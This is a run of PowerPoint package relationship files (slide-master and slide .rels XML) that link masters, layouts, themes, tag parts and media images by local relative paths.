<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout42.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout43.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag218.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slideLayout" Target="../slideLayouts/slideLayout44.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag222.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slideLayout" Target="../slideLayouts/slideLayout45.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.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slideLayout" Target="../slideLayouts/slideLayout46.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230.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slideLayout" Target="../slideLayouts/slideLayout47.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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slideLayout" Target="../slideLayouts/slideLayout48.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag238.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slideLayout" Target="../slideLayouts/slideLayout49.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme49.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag242.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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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Layout" Target="../slideLayouts/slideLayout6.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme50.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag246.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slideLayout" Target="../slideLayouts/slideLayout51.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag250.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49.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme53.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag258.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slideLayout" Target="../slideLayouts/slideLayout54.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag262.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61.xml"/><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slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag266.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slideLayout" Target="../slideLayouts/slideLayout56.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270.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69.xml"/><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slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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slideLayout" Target="../slideLayouts/slideLayout58.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.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77.xml"/><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slideLayout" Target="../slideLayouts/slideLayout59.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme59.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag282.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slideLayout" Target="../slideLayouts/slideLayout60.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster6.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme60.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286.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slideLayout" Target="../slideLayouts/slideLayout61.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme61.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290.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89.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag288.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag287.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme62.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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slideLayout" Target="../slideLayouts/slideLayout63.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag298.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97.xml"/><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slideLayout" Target="../slideLayouts/slideLayout64.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme64.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag302.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301.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag300.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId1"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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster8.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster9.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme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0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2"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3"/>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4"/>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8"/>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9"/>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10"/>
    </p:custDataLst>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4"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6"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0"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2"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4"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6"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50"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52"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54"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56"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5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60"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62"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64"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66"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6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70"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72"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74"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76"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307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag305.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag303.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46.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag357.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag356.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag355.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag354.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag353.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47.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag362.xml"/><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tags" Target="../tags/tag359.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag358.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48.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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tags" Target="../tags/tag364.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag363.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49.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag372.xml"/><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tags" Target="../tags/tag369.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag368.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50.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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tags" Target="../tags/tag373.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51.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag382.xml"/><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tags" Target="../tags/tag379.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag378.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag383.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53.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag387.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag386.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag385.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54.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag390.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag389.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag388.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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag392.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag391.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag312.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag311.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag309.xml"/><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tags" Target="../tags/tag317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.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56.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag400.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag399.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag398.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.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57.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag402.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag401.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58.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag410.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag409.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag408.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag407.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag406.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59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag412.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag411.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60.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag420.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag419.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag418.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag417.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag416.xml"/></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61.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag422.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag421.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62.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag428.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag427.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.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65.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag429.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63.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.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64.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag435.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag325.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag324.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag323.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag322.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag320.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag319.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag327.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag326.xml"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag445.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag456.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId7" 